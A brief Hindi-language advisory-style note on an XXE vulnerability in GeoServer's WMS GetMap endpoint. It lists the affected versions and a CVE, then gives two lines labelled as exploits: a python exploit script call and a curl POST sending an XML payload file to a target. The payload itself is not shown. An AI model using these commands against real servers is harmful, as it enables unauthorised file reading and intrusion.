
विशिष्ट एंडपॉइंट /geoserver/wms ऑपरेशन GetMap के माध्यम से XXE - Geoserver
संस्करण 2.26.0 से 2.26.2 से पहले और 2.25.6 से पहले तक, एक XML External Entity (XXE) भेद्यता की पहचान की गई थी। एप्लिकेशन विशिष्ट एंडपॉइंट /geoserver/wms के GetMap ऑपरेशन के माध्यम से XML इनपुट स्वीकार करता है।

Exploit1:
python3 CVE-2025-58360 -u http://example.com
Exploit2:
curl -X POST "http://example.com/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" -H "Content-Type: application/xml" --data-binary @payload.xml -o output.png